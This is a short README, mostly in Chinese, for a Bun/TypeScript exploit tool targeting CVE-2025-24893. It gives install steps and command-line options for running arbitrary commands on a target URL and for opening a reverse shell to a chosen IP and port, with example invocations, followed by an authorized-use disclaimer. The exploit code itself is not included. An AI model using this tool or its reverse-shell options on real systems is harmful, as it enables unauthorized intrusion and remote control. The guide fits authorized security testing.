安装 bun:
curl -fsSL https://bun.com/install | bash
安装依赖:
bun install
运行:
bun run CVE-2025-24893.ts
本项目是使用 bun v1.2.19 的 bun init 创建的。Bun 是一个快速的一体化 JavaScript 运行时。
Usage: bun CVE-2025-24893.ts [options]
Options:
-u, --url <url> The target URL to interact with.
-i, --ip <ip-address> The IP address for a reverse shell connection.
-p, --port <port-number> The port number for the reverse shell.
-r, --rverse Open a reverse shell connection.
-c, --cmd <command> Execute a specific command.
Examples:
# Execute a command on a target URL
bun CVE-2025-24893.ts --url http://example.com --cmd "ls -la"
# Open a reverse shell
bun CVE-2025-24893.ts --rverse --ip 127.0.0.1 --port 4444
此漏洞利用工具及指南仅供教育目的使用。请负责任地使用此信息,并且仅在你拥有明确测试权限的系统上使用。未经授权利用系统是非法且不道德的行为。作者和贡献者不对因使用此信息而造成的任何误用或损害负责。